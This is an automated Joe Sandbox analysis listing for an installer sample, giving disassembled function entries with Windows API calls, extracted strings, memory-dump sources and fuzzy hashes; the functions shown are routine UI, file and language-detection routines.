                                                                                                                        • Instruction ID: f95120b3a23da5cc0ce1d172a65d2bf3d0e5c634912153d3d0ad17c2c6fd644c
                                                                                                                        • Opcode Fuzzy Hash: 0f1a0fb318c70437b0164d8cc980d4a83bb33c01d9a9b477b32c375053970ef7
                                                                                                                        • Instruction Fuzzy Hash: 97027D74A00209EFDB10CFA4C948BAEBBF5FF49715F144169F805EB290DB75A945CB21
                                                                                                                        Function 00875B60 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,C7BA013E), ref: 00875BE8
                                                                                                                          • Part of subcall function 00857B30: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00857B66
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00875CEB
                                                                                                                        • SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00875CFF
                                                                                                                        • SendMessageW.USER32(00000000,00000421,00000003,?), ref: 00875D14
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 00875D29
                                                                                                                        • SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00875D40
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00875D60
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00875D72
                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00875DD4
                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00875DE4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ClientCreateLongRectScreen
                                                                                                                        • String ID: tooltips_class32
                                                                                                                        • API String ID: 1468030502-1918224756
                                                                                                                        • Opcode ID: 256eab7faad5c4b5e2910a41ca2bd66d44da9afad256660d8840641869ab2fd0
                                                                                                                        • Instruction ID: b03a1ee65271563db7a833a3e682dc419514ed9b1055720187dd8233304f1b6c
                                                                                                                        • Opcode Fuzzy Hash: 256eab7faad5c4b5e2910a41ca2bd66d44da9afad256660d8840641869ab2fd0
                                                                                                                        • Instruction Fuzzy Hash: A4914071A00209AFDB24DFA4CD95FAEBBF9FB48300F10852AF516EB294D774A905CB50
                                                                                                                        Function 009A0440 Relevance: 16.8, APIs: 11, Instructions: 323COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 88dfa9b3c1f090e8c1910039696a55d8af190a117f623804170bb190ea5fc3b0
                                                                                                                        • Instruction ID: 9c37bc1c287da36de819068a9266b59669f067a20c2b07cdcaf44e180a87c50a
                                                                                                                        • Opcode Fuzzy Hash: 88dfa9b3c1f090e8c1910039696a55d8af190a117f623804170bb190ea5fc3b0
                                                                                                                        • Instruction Fuzzy Hash: 01A1E671A00205AFDB20AF64DC85FAF7BB8FF96710F104169F905AB291DB75E901CBA1
                                                                                                                        Function 00976280 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 283COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0096AEB0: LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,009762E1,?,C7BA013E,?,?), ref: 0096AECB
                                                                                                                          • Part of subcall function 0096AEB0: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0096AEE1
                                                                                                                          • Part of subcall function 0096AEB0: FreeLibrary.KERNEL32(00000000), ref: 0096AF1A
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104,C7BA013E,?,?), ref: 009764C0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressEnvironmentFreeLoadProcVariable
                                                                                                                        • String ID: AI_BOOTSTRAPPERLANGS$APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFilesFolder$Shell32.dll$Shlwapi.dll
                                                                                                                        • API String ID: 788177547-1020860216
                                                                                                                        • Opcode ID: 15b05af7d7b201b97de97fd1596b598c434ff3edb4a79fe6d5e3dac7fe0cc687
                                                                                                                        • Instruction ID: 456f3cfe39c577288e0670a61e85709bf5f4eef7646135f6c3c02211fd7cea5e
                                                                                                                        • Opcode Fuzzy Hash: 15b05af7d7b201b97de97fd1596b598c434ff3edb4a79fe6d5e3dac7fe0cc687
                                                                                                                        • Instruction Fuzzy Hash: 159105726016059FDB24DF24C845BBAB3B9FF65314F1485ADE80ADB295EB31EE41CB80
                                                                                                                        Function 00874760 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124windowstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000043A,00000000,00000074), ref: 008747D5
                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000020), ref: 0087484B
                                                                                                                        • GetDC.USER32(?), ref: 0087486E
                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00874875
                                                                                                                        • MulDiv.KERNEL32(?,00000048,00000000), ref: 00874888
                                                                                                                        • SendMessageW.USER32(?,00000444,00000000,00000074), ref: 008748BA
                                                                                                                        • DeleteObject.GDI32(?), ref: 008748F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CapsDeleteDeviceObjectlstrcpyn
                                                                                                                        • String ID: ?$t
                                                                                                                        • API String ID: 2619291461-1995845436
                                                                                                                        • Opcode ID: 01545f600c50bb374d1f16153cf371432e8a66d75de4aeabad0fb4eef670fdee
                                                                                                                        • Instruction ID: 1b971786eae9fe85f6a7f72aa2bf0b1693373103eddea4f78edeff4149ea0192
                                                                                                                        • Opcode Fuzzy Hash: 01545f600c50bb374d1f16153cf371432e8a66d75de4aeabad0fb4eef670fdee
                                                                                                                        • Instruction Fuzzy Hash: 68517B71908341AFE731DF60D949BABBBE8FB48701F00492EF699C6191DB74E509CB52
                                                                                                                        Function 00856290 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 119COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00B3683C,C7BA013E,00000000,?,?,?,?,?,?,00855ABE,00A413ED,000000FF), ref: 008562CD
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00856348
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 008563EE
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 00856443
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalCursorLoadSection$EnterLeave
                                                                                                                        • String ID: v$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                        • API String ID: 3727441302-4127849342
                                                                                                                        • Opcode ID: a163340dd50acd0ac50f77e0f06ef45151a99782709708755354c1f80045e539
                                                                                                                        • Instruction ID: 9ffa5828bdcffea9f0e760d91bc66c87fd24efa10edba169fe5dd2cde6203ac1
                                                                                                                        • Opcode Fuzzy Hash: a163340dd50acd0ac50f77e0f06ef45151a99782709708755354c1f80045e539
                                                                                                                        • Instruction Fuzzy Hash: 3B512CB1D00219EFDB11DF94D848BEEBBF8FB08714F50016AE814F7280EBB555098B94
                                                                                                                        Function 0098A350 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 148libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 0098A38C
                                                                                                                        • GetUserDefaultLangID.KERNEL32 ref: 0098A399
                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 0098A3AB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 0098A3BF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0098A3D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDefaultLangProc$LibraryLoadSystemUser
                                                                                                                        • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
                                                                                                                        • API String ID: 667524283-3528650308
                                                                                                                        • Opcode ID: 9af9e357018a248aa2ce335dc426b4cb436f5da990a122bb4f33ee574661c38c
                                                                                                                        • Instruction ID: 10982553e045b81d5bd12cd69f09a2e1dd9686d5e55cfc6d91c72610082c7ea8
                                                                                                                        • Opcode Fuzzy Hash: 9af9e357018a248aa2ce335dc426b4cb436f5da990a122bb4f33ee574661c38c
                                                                                                                        • Instruction Fuzzy Hash: 2A41AA306043119FEB54EF28E85467AB7E6EBE8310F91092EE885C32A0EB74C945CB52
                                                                                                                        Function 00A19B10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00A19B47
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00A19B4F
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00A19BD8
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00A19C03
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00A19C58
                                                                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00A19C6E
                                                                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00A19C83
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1385549066-1018135373
                                                                                                                        • Opcode ID: 1cb5935ef1444a89d5eb9b41420ca1629b450ee9766e16e7771cb8fd7c3fc9bf
                                                                                                                        • Instruction ID: 5410baf36072f518d7e30f43e32e0709114073d17c7929d1cb76c9d7e61a4419
                                                                                                                        • Opcode Fuzzy Hash: 1cb5935ef1444a89d5eb9b41420ca1629b450ee9766e16e7771cb8fd7c3fc9bf
                                                                                                                        • Instruction Fuzzy Hash: E3410234A082189FCF10DF68D9A0AEFBBF5EF45324F148095E8195B392C7319A86CB91
                                                                                                                        Function 009475F0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 248fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000), ref: 009476DF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00947707
                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 00947749
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0094779E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseFileHandle$CreateWrite
                                                                                                                        • String ID: .bat$EXE$open
                                                                                                                        • API String ID: 3602564925-2898749727
                                                                                                                        • Opcode ID: a6e915b4c43f8d5c5a3034318a34fe4dd6ea1688ac0afe659f4d758e0c9516c3
                                                                                                                        • Instruction ID: 3425076443a922360f14fb525d7bf18854bc8418eb3e03225e4eab9457396e61
                                                                                                                        • Opcode Fuzzy Hash: a6e915b4c43f8d5c5a3034318a34fe4dd6ea1688ac0afe659f4d758e0c9516c3
                                                                                                                        • Instruction Fuzzy Hash: 60A17970905648EFEB10CFA8CD48B9DFBB8FF45314F2482A9E415AB291DB709D05CB61
                                                                                                                        Function 008598C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(0000000E,C7BA013E,?,?,00000000,?), ref: 008598FE
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0085993F
                                                                                                                        • EnterCriticalSection.KERNEL32(00B3683C), ref: 0085995F
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 00859983
                                                                                                                        • CreateWindowExW.USER32(00000000,00000000,00000000,00B3683C,?,80000000,00000000,80000000,00000000,00000000,00000000), ref: 008599DE
                                                                                                                          • Part of subcall function 00A15943: GetProcessHeap.KERNEL32(00000008,00000008,00000000,0098AB8E,?,?,?,?,?,?), ref: 00A15948
                                                                                                                          • Part of subcall function 00A15943: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A1594F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
                                                                                                                        • String ID: v$AXWIN UI Window
                                                                                                                        • API String ID: 213679520-2690018532
                                                                                                                        • Opcode ID: bdf6564f0da66db85bb72128a13a6628557f8abedd3e2421bd126cb813e1b56f
                                                                                                                        • Instruction ID: 9646f773b2b00547a95c6771f2a9ec2d6d745d74565c2edc3100420b8858ce4d
                                                                                                                        • Opcode Fuzzy Hash: bdf6564f0da66db85bb72128a13a6628557f8abedd3e2421bd126cb813e1b56f
                                                                                                                        • Instruction Fuzzy Hash: 0A51C335A00205EFDB10CF68DD05B9ABBF8FB88715F10816AFD44E7290E771A915CBA1
                                                                                                                        Function 0085D910 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 150fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0085D9FF
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,C7BA0140), ref: 0085DA53
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0085DAB0
                                                                                                                          • Part of subcall function 00A162A2: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162AD
                                                                                                                          • Part of subcall function 00A162A2: LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162EA
                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0085DB17
                                                                                                                        • CloseHandle.KERNEL32(00000000,00A1301E), ref: 0085DB3D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
                                                                                                                        • String ID: aix$html
                                                                                                                        • API String ID: 2030708724-2369804267
                                                                                                                        • Opcode ID: 1c0a66484ed02fcf9ba498d76665ef97920b121f28a1ca38f97fd4f3125f1317
                                                                                                                        • Instruction ID: f16c684a1dd2d186544fa1c7385b4a363cf9574744db98c627f247a583c2d0aa
                                                                                                                        • Opcode Fuzzy Hash: 1c0a66484ed02fcf9ba498d76665ef97920b121f28a1ca38f97fd4f3125f1317
                                                                                                                        • Instruction Fuzzy Hash: 6261C2B0900348EFDB10DFA4CD49B9EBBF4FB59708F24811EE401AB291DBB56949CB61
                                                                                                                        Function 008426E0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00B3150C,00000000,C7BA013E,00000000,00A7B2C3,000000FF,?,C7BA013E), ref: 00842853
                                                                                                                        • GetLastError.KERNEL32(?,C7BA013E), ref: 0084285D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                                        • String ID: VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
                                                                                                                        • API String ID: 439134102-34576578
                                                                                                                        • Opcode ID: 01454217ac514709648c379aeb1fad8a72fa72df8ef65717e121f52abe53a413
                                                                                                                        • Instruction ID: e76bff7fdebc2613f29d42690051e94319eef1df8a443582d0d3a037a68533ea
                                                                                                                        • Opcode Fuzzy Hash: 01454217ac514709648c379aeb1fad8a72fa72df8ef65717e121f52abe53a413
                                                                                                                        • Instruction Fuzzy Hash: 2251D1B1904209DBCB00CFA8DD05BDEBBF8FB48324F204A69E815E7391EB7599048F91
                                                                                                                        Function 00860A60 Relevance: 12.3, APIs: 8, Instructions: 337COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: RectWindow$Client
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3228027793-0
